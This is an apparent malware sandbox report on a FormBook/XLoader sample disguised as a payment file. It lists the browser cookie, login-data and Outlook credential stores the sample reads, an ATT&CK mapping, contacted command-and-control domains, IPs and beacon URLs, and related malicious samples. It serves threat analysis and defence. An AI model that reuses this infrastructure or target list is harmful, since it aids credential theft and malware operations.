Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Queries volume information: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 4.2.NF_Payment_Ref_FAN930276.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.NF_Payment_Ref_FAN930276.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2264308195.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4487793740.00000000050A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2290607286.0000000004E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4487721916.0000000002AA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4486586817.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4486891698.0000000003770000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2266187962.0000000001E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\colorcpl.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\colorcpl.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 4.2.NF_Payment_Ref_FAN930276.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.NF_Payment_Ref_FAN930276.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2264308195.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4487793740.00000000050A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2290607286.0000000004E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4487721916.0000000002AA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4486586817.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4486891698.0000000003770000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2266187962.0000000001E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	312 Process Injection	1 Masquerading	1 OS Credential Dumping	121 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Abuse Elevation Control Mechanism	1 Disable or Modify Tools	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	41 Virtualization/Sandbox Evasion	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	312 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Abuse Elevation Control Mechanism	Cached Domain Credentials	113 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	4 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	12 Software Packing	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 DLL Side-Loading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
NF_Payment_Ref_FAN930276.exe	61%	ReversingLabs	ByteCode-MSIL.Trojan.XLoader
NF_Payment_Ref_FAN930276.exe	51%	Virustotal		Browse
NF_Payment_Ref_FAN930276.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
jexiz.shop	1%	Virustotal		Browse
7fh27o.vip	2%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.rebel.tienda	199.59.243.227	true	true		unknown
www.timizoasisey.shop	188.114.96.3	true	true		unknown
jexiz.shop	8.210.3.99	true	true	1%, Virustotal, Browse	unknown
7fh27o.vip	3.33.130.190	true	true	2%, Virustotal, Browse	unknown
prediksipreman.fyi	162.0.215.244	true	true		unknown
roopiedutech.online	103.191.208.137	true	true		unknown
www.ila.beauty	13.248.169.48	true	true		unknown
www.givora.site	162.0.231.203	true	true		unknown
www.college-help.info	38.88.82.56	true	true		unknown
owinvip.net	3.33.130.190	true	true		unknown
ladylawher.org	3.33.130.190	true	true		unknown
gucciqueen.shop	178.79.184.196	true	true		unknown
www.meanttobebroken.org	141.193.213.10	true	true		unknown
www.2925588.com	103.71.154.12	true	true		unknown
wrl-llc.net	3.33.130.190	true	true		unknown
www.prediksipreman.fyi	unknown	unknown	false		unknown
www.7fh27o.vip	unknown	unknown	false		unknown
www.ladylawher.org	unknown	unknown	false		unknown
www.wrl-llc.net	unknown	unknown	false		unknown
www.gucciqueen.shop	unknown	unknown	false		unknown
www.jexiz.shop	unknown	unknown	false		unknown
www.roopiedutech.online	unknown	unknown	false		unknown
www.xtelify.tech	unknown	unknown	false		unknown
www.owinvip.net	unknown	unknown	false		unknown

Contacted URLs

Name	Malicious	Reputation
http://www.gucciqueen.shop/x3by/?nl=Gq0m/cYr7UOoL/rfxlXcWcb0PFgu3v+6IQg5KkZ1GbFCfXnP9OdFnXsg+153ZunkN9E3pnQymCUHBFpvF3MPrj7bwNIl4rM9hQX9D40sB8Q0fvNSVLrWgvNkuIucpqHerw==&dbL=d8WX_v0PGVHXAtK	true	unknown
http://www.givora.site/855d/?nl=2B0ERzH0P28lwthSCfczi4+l4RSaGiycEDtAIyO4xBEaITWb1iLHHs/q7NYM0I/g8MkSYcfxzku7nIYL4eoS8eZDgAyht6z65PzZnN779aUYRwuiIRWQuovW44/rxTRHXQ==&dbL=d8WX_v0PGVHXAtK	true	unknown
http://www.college-help.info/lk0h/	true	unknown
http://www.roopiedutech.online/f01d/	true	unknown
http://www.prediksipreman.fyi/3lre/?nl=/6Vdp+1Y21llHWrnJFgTkMelxgdakbST517P2ezUMEZQpYm2I4KB95g+5G1ZwATxC5oRicPrlKz7UaUXu7WnWVF0YU8xlLcjqFiWcTqSDyUhRRfYLZXOVM1ZwNUIzk+NCQ==&dbL=d8WX_v0PGVHXAtK	true	unknown
http://www.7fh27o.vip/l5ty/	true	unknown
http://www.jexiz.shop/li8d/?nl=sm+xvlFNJ8Jn1MAvBLHfFbmpWDRmMBXnhYuDtN4QDuuoOIQ72IBR7vtXSrP0imT8uQD+i024Jy05gJvrsmbroocsQ5/sNLlweHoyZNleSM2rCzfY5hv0qSgJrhCITOEEHg==&dbL=d8WX_v0PGVHXAtK	true	unknown
http://www.owinvip.net/17h7/	true	unknown
http://www.givora.site/855d/	true	unknown
http://www.2925588.com/jx6k/	true	unknown
http://www.owinvip.net/17h7/?nl=+i5q+uzPXmftyZtNZWFr8MC7YoCmvyBt3jjX/X3oRNPJ70eO25N0w4zqWgP4747OpVXsIhnZv7nMmjeXISBtoaIRC/e00OgY88L+a0UDDIyF3kq1BSJhp/lI21Ai+QA6UQ==&dbL=d8WX_v0PGVHXAtK	true	unknown
http://www.2925588.com/jx6k/?nl=beqWGJ7SP2hkLKuH8Xmdr/HDPWeS3cMOlVU3zrC7D+GWWG+2bEVKgJQW/9jqYGl3wiT++u8kPbwe1lvFRaGrQmwW5G4wa8+lbGyMUfdWvdM0+8z00F7HMhpKv8gPeACQcQ==&dbL=d8WX_v0PGVHXAtK	true	unknown
http://www.ila.beauty/izfe/?nl=ZqR1VSau/njxt8ya9FYdrisRnPwESR8PWK+oFQcVqsUu7dENmwaUoGLSs5vyS4FhQGGlB6r8hHtwTYfK8h1233SUSY5+fAIxnLEAPxNpmpufjlKG3bng8CVsKsGNybcU1g==&dbL=d8WX_v0PGVHXAtK	true	unknown
http://www.meanttobebroken.org/9g6s/	true	unknown
http://www.prediksipreman.fyi/3lre/	true	unknown
http://www.timizoasisey.shop/3p0l/?dbL=d8WX_v0PGVHXAtK&nl=4Jzo6X1Gluc/SF20pEVAyAZrEiE76xvvY+EfZYFlmMajnWRT/uq2dkdTzHDiVdaw3QhDvVFcv5rBuyftUViEMVRHp90uGCn944ajrH63wHv4zzWs5+CZDXB+Ld7sX0D68A==	true	unknown
http://www.timizoasisey.shop/3p0l/	true	unknown
http://www.roopiedutech.online/f01d/?nl=BGh1WRbt41ta6S2FBwbFkSvU00HbY3eh/tMOUMfhmAze8NROyFh0EV68tSphjf8OeMOb/ck28qXApfwtDELR0J5SPWkS+xOxljfz11yABU5EX0aP/5qC9r+4s36BWCggxQ==&dbL=d8WX_v0PGVHXAtK	true	unknown
http://www.jexiz.shop/li8d/	true	unknown
http://www.wrl-llc.net/6o8s/	true	unknown
http://www.rebel.tienda/7n9v/	true	unknown
http://www.gucciqueen.shop/x3by/	true	unknown
http://www.ila.beauty/izfe/	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	colorcpl.exe, 00000007.00000002.4490954229.0000000008698000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	colorcpl.exe, 00000007.00000002.4490954229.0000000008698000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://meanttobebroken.org/9g6s/?nl=l/X	colorcpl.exe, 00000007.00000002.4488704963.0000000005E86000.00000004.10000000.00040000.00000000.sdmp, xIrbjTuvDXL.exe, 00000008.00000002.4488131798.0000000003806000.00000004.00000001.00040000.00000000.sdmp	false		unknown
http://www.roopiedutech.online	xIrbjTuvDXL.exe, 00000008.00000002.4490185532.0000000005739000.00000040.80000000.00040000.00000000.sdmp	false		unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	colorcpl.exe, 00000007.00000002.4490954229.0000000008698000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.jexiz.shop/li8d/?nl=sm	xIrbjTuvDXL.exe, 00000008.00000002.4488131798.0000000003998000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	colorcpl.exe, 00000007.00000002.4490954229.0000000008698000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	colorcpl.exe, 00000007.00000002.4490954229.0000000008698000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ac.ecosia.org/autocomplete?q=	colorcpl.exe, 00000007.00000002.4490954229.0000000008698000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com	colorcpl.exe, 00000007.00000002.4488704963.0000000006984000.00000004.10000000.00040000.00000000.sdmp, colorcpl.exe, 00000007.00000002.4490814883.0000000008310000.00000004.00000800.00020000.00000000.sdmp, xIrbjTuvDXL.exe, 00000008.00000002.4488131798.0000000004304000.00000004.00000001.00040000.00000000.sdmp	false		unknown
http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer	colorcpl.exe, 00000007.00000002.4488704963.00000000061AA000.00000004.10000000.00040000.00000000.sdmp, xIrbjTuvDXL.exe, 00000008.00000002.4488131798.0000000003B2A000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	colorcpl.exe, 00000007.00000002.4490954229.0000000008698000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	colorcpl.exe, 00000007.00000002.4490954229.0000000008698000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
141.193.213.10	www.meanttobebroken.org	United States	396845	DV-PRIMARY-ASN1US	true
162.0.215.244	prediksipreman.fyi	Canada	35893	ACPCA	true
13.248.169.48	www.ila.beauty	United States	16509	AMAZON-02US	true
162.0.231.203	www.givora.site	Canada	22612	NAMECHEAP-NETUS	true
38.88.82.56	www.college-help.info	United States	174	COGENT-174US	true
178.79.184.196	gucciqueen.shop	United Kingdom	63949	LINODE-APLinodeLLCUS	true
188.114.96.3	www.timizoasisey.shop	European Union	13335	CLOUDFLARENETUS	true
103.191.208.137	roopiedutech.online	unknown	7575	AARNET-AS-APAustralianAcademicandResearchNetworkAARNe	true
103.71.154.12	www.2925588.com	Hong Kong	132325	LEMON-AS-APLEMONTELECOMMUNICATIONSLIMITEDHK	true
199.59.243.227	www.rebel.tienda	United States	395082	BODIS-NJUS	true
3.33.130.190	7fh27o.vip	United States	8987	AMAZONEXPANSIONGB	true
8.210.3.99	jexiz.shop	Singapore	45102	CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1546519
Start date and time:	2024-11-01 03:44:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 25s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	NF_Payment_Ref_FAN930276.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@9/2@16/12
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 96% Number of executed functions: 95 Number of non-executed functions: 297
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target xIrbjTuvDXL.exe, PID 1268 because it is empty
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.

Simulations

Behavior and APIs

Time	Type	Description
22:45:03	API Interceptor	1x Sleep call for process: NF_Payment_Ref_FAN930276.exe modified
22:45:58	API Interceptor	11247806x Sleep call for process: colorcpl.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
141.193.213.10	Indocount Invoice Amendment.exe	Get hash	malicious	FormBook	Browse	www.meanttobeuseren.org/zdt7/
	HT9324-25 1x40HC LDHFCLDEHAM29656 MRSU5087674.exe	Get hash	malicious	FormBook	Browse	www.meanttobebroken.org/zdt7/
	18in SPA-198-2024.exe	Get hash	malicious	FormBook	Browse	www.meanttobebroken.org/9g6s/
	OREN Engine Stores Requisition 4th quarter OREN-ES-2024-010 & OREN-ES-2024-011.exe	Get hash	malicious	FormBook	Browse	www.meanttobebroken.org/zdt7/
	bin.exe	Get hash	malicious	Unknown	Browse	www.meanttobebroken.org/zdt7/
	PO1268931024 - Bank Slip.exe	Get hash	malicious	PureLog Stealer	Browse	www.meanttobebroken.org/9g6s/
	http://www.gofreight.com/	Get hash	malicious	Unknown	Browse	www.gofreight.com/
	http://www.trayak.com	Get hash	malicious	Unknown	Browse	trayak.com/
	http://tacinc.org	Get hash	malicious	Unknown	Browse	www.tacinc.org/
	https://exclusive.thechosenadventures.com/unlock/?otreset=false&otpreview=true&otgeo=gb	Get hash	malicious	Unknown	Browse	thechosenadventures.com/
162.0.215.244	18in SPA-198-2024.exe	Get hash	malicious	FormBook	Browse	www.prediksipreman.fyi/3lre/
	PO1268931024 - Bank Slip.exe	Get hash	malicious	PureLog Stealer	Browse	www.prediksipreman.fyi/3lre/
	http://mirchmasala2go.com	Get hash	malicious	Unknown	Browse	mirchmasala2go.com/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.timizoasisey.shop	18in SPA-198-2024.exe	Get hash	malicious	FormBook	Browse	188.114.97.3
	PO1268931024 - Bank Slip.exe	Get hash	malicious	PureLog Stealer	Browse	188.114.96.3
	PR. No.1599-Rev.2.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
www.givora.site	18in SPA-198-2024.exe	Get hash	malicious	FormBook	Browse	162.0.231.203
www.givora.site	PO1268931024 - Bank Slip.exe	Get hash	malicious	PureLog Stealer	Browse	162.0.231.203
www.rebel.tienda	18in SPA-198-2024.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	mm.exe	Get hash	malicious	Unknown	Browse	199.59.243.227
	PO1268931024 - Bank Slip.exe	Get hash	malicious	PureLog Stealer	Browse	199.59.243.227
www.college-help.info	18in SPA-198-2024.exe	Get hash	malicious	FormBook	Browse	38.88.82.56
	WARUNKI UMOWY-pdf.bat.exe	Get hash	malicious	FormBook, GuLoader	Browse	38.88.82.56
	PO1268931024 - Bank Slip.exe	Get hash	malicious	PureLog Stealer	Browse	38.88.82.56
www.ila.beauty	Indocount Invoice Amendment.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	HT9324-25 1x40HC LDHFCLDEHAM29656 MRSU5087674.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	18in SPA-198-2024.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	SecuriteInfo.com.Win32.SuspectCrc.28663.30359.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	OREN Engine Stores Requisition 4th quarter OREN-ES-2024-010 & OREN-ES-2024-011.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	quotation RFQ no 123609.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	13.248.169.48
	Due Payment Invoice PISS2024993.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	bin.exe	Get hash	malicious	Unknown	Browse	13.248.169.48
	PO1268931024 - Bank Slip.exe	Get hash	malicious	PureLog Stealer	Browse	13.248.169.48

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
NAMECHEAP-NETUS	FW CMA SHZ Freight invoice CHN1080769.exe	Get hash	malicious	FormBook	Browse	199.192.21.169
	Advanced_IP_Scanner_2.5.4594.12.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	199.188.200.195
	Advanced_IP_Scanner_2.5.4594.12.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	199.188.200.195
	https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	199.188.200.195
	https://saniest.com/PO/PO%20-%20OCT.'24673937.rar	Get hash	malicious	Unknown	Browse	162.0.232.202
	#U2749Factura_#U2749_#U2462#U2465#U2460#U2463#U2463#U2460#U2462#U2461.hta	Get hash	malicious	Unknown	Browse	68.65.122.45
	#U2749Factura_#U2749_#U2466#U2461#U2466#U2462#U2467#U2465#U2465#U2465.hta	Get hash	malicious	Unknown	Browse	68.65.122.45
	672365339196e.vbs	Get hash	malicious	Unknown	Browse	68.65.122.45
	18in SPA-198-2024.exe	Get hash	malicious	FormBook	Browse	162.0.231.203
	WARUNKI UMOWY-pdf.bat.exe	Get hash	malicious	FormBook, GuLoader	Browse	162.0.231.203
ACPCA	Contrato.exe	Get hash	malicious	DarkCloud	Browse	162.55.60.2
	FACTURA - FOB-78787-5677__________________pif.exe	Get hash	malicious	DarkCloud	Browse	162.55.60.2
	SecuriteInfo.com.BackDoor.AgentTeslaNET.20.28177.5145.exe	Get hash	malicious	DarkCloud	Browse	162.55.60.2
	18in SPA-198-2024.exe	Get hash	malicious	FormBook	Browse	162.0.215.244
	Se adjuntan los documentos de env#U00edo originales DHL.exe	Get hash	malicious	DarkCloud	Browse	162.55.60.2
	Purchase_Order_pdf.exe	Get hash	malicious	FormBook	Browse	162.0.209.213
	jew.x86.elf	Get hash	malicious	Mirai	Browse	162.54.84.226
	rpurchasyinquiry.exe	Get hash	malicious	FormBook	Browse	162.0.211.143
	splmpsl.elf	Get hash	malicious	Unknown	Browse	162.8.38.161
	splm68k.elf	Get hash	malicious	Unknown	Browse	162.64.111.227
AMAZON-02US	.i.elf	Get hash	malicious	Unknown	Browse	54.171.230.55
	shngijernbh.arm6.elf	Get hash	malicious	Gafgyt, Mirai	Browse	54.171.230.55
	linux_mips64el_softfloat.elf	Get hash	malicious	Chaos	Browse	54.171.230.55
	https://www.dropbox.com/l/scl/AAATBuomd5HmxEQWOFFl7juYr5pumA9OT78	Get hash	malicious	Unknown	Browse	34.249.87.52
	https://www.dropbox.com/l/scl/AAATBuomd5HmxEQWOFFl7juYr5pumA9OT78	Get hash	malicious	Unknown	Browse	143.204.95.12
	https://www.dropbox.com/l/scl/AAATBuomd5HmxEQWOFFl7juYr5pumA9OT78	Get hash	malicious	Unknown	Browse	143.204.95.12
	https://www.dropbox.com/scl/fi/ghbickob35cseupehrevo/A-file-has-been-sent-to-you-via-DROPBOX.pdf?oref=e&r=ACTqvRbsSp0aGfWJ258Mnmig2JSiZYPEXawWQbeoOGqhLQ0A_g08q_6x9uCS3GDD06X2I92wp1DOmKpzocpy-33mPeFHFTHNUnOplz6Tt7UNKnGCY5hdeIU9t4fHEX4CzcseX3o9vxkcg76RpGddDTfgU6DIWzrB6Y3NN3SHwd0oXjHE8-2WVTMkcFhAlN56hFRzwFRs7uWEYIbpWWN2yfXr&sm=1&dl=0	Get hash	malicious	Unknown	Browse	143.204.95.12
	https://www.phsinc.com/?bwfan-track-action=click&bwfan-track-id=0ecdd1bdf2276cad3fa2d27ffa918e84&bwfan-uid=e2dffed46dd69d19d18bc527d6255bd5&bwfan-link=%68%74%74%70%73%3A%2F%2F%6D%61%69%6C%2E%72%69%67%6F%74%69%6C%65%73%2E%63%6F%6D%2F%6A%50%73%51%57%55%63%42	Get hash	malicious	HTMLPhisher, ReCaptcha Phish	Browse	3.132.253.175
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	18.238.171.119
	https://hotmail.pizza4you.com.br/	Get hash	malicious	Mamba2FA	Browse	13.227.219.11
DV-PRIMARY-ASN1US	Indocount Invoice Amendment.exe	Get hash	malicious	FormBook	Browse	141.193.213.10
	HT9324-25 1x40HC LDHFCLDEHAM29656 MRSU5087674.exe	Get hash	malicious	FormBook	Browse	141.193.213.10
	18in SPA-198-2024.exe	Get hash	malicious	FormBook	Browse	141.193.213.10
	yGktPvplJn.exe	Get hash	malicious	Pushdo	Browse	141.193.213.11
	OREN Engine Stores Requisition 4th quarter OREN-ES-2024-010 & OREN-ES-2024-011.exe	Get hash	malicious	FormBook	Browse	141.193.213.10
	quotation RFQ no 123609.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	141.193.213.11
	Due Payment Invoice PISS2024993.exe	Get hash	malicious	FormBook	Browse	141.193.213.11
	bin.exe	Get hash	malicious	Unknown	Browse	141.193.213.10
	PO1268931024 - Bank Slip.exe	Get hash	malicious	PureLog Stealer	Browse	141.193.213.10
	https://click.pstmrk.it/3s/tldr.tech%2Fconfirmed%3Femail%3Djames.ward%2540gerflor.com%26newsletter%3Dinfosec/pEGE/grO4AQ/AQ/de2d9b1d-a87c-40b3-97e7-314a53573877/2/GfrX-GFLqn	Get hash	malicious	HTMLPhisher	Browse	141.193.213.20

Process:	C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
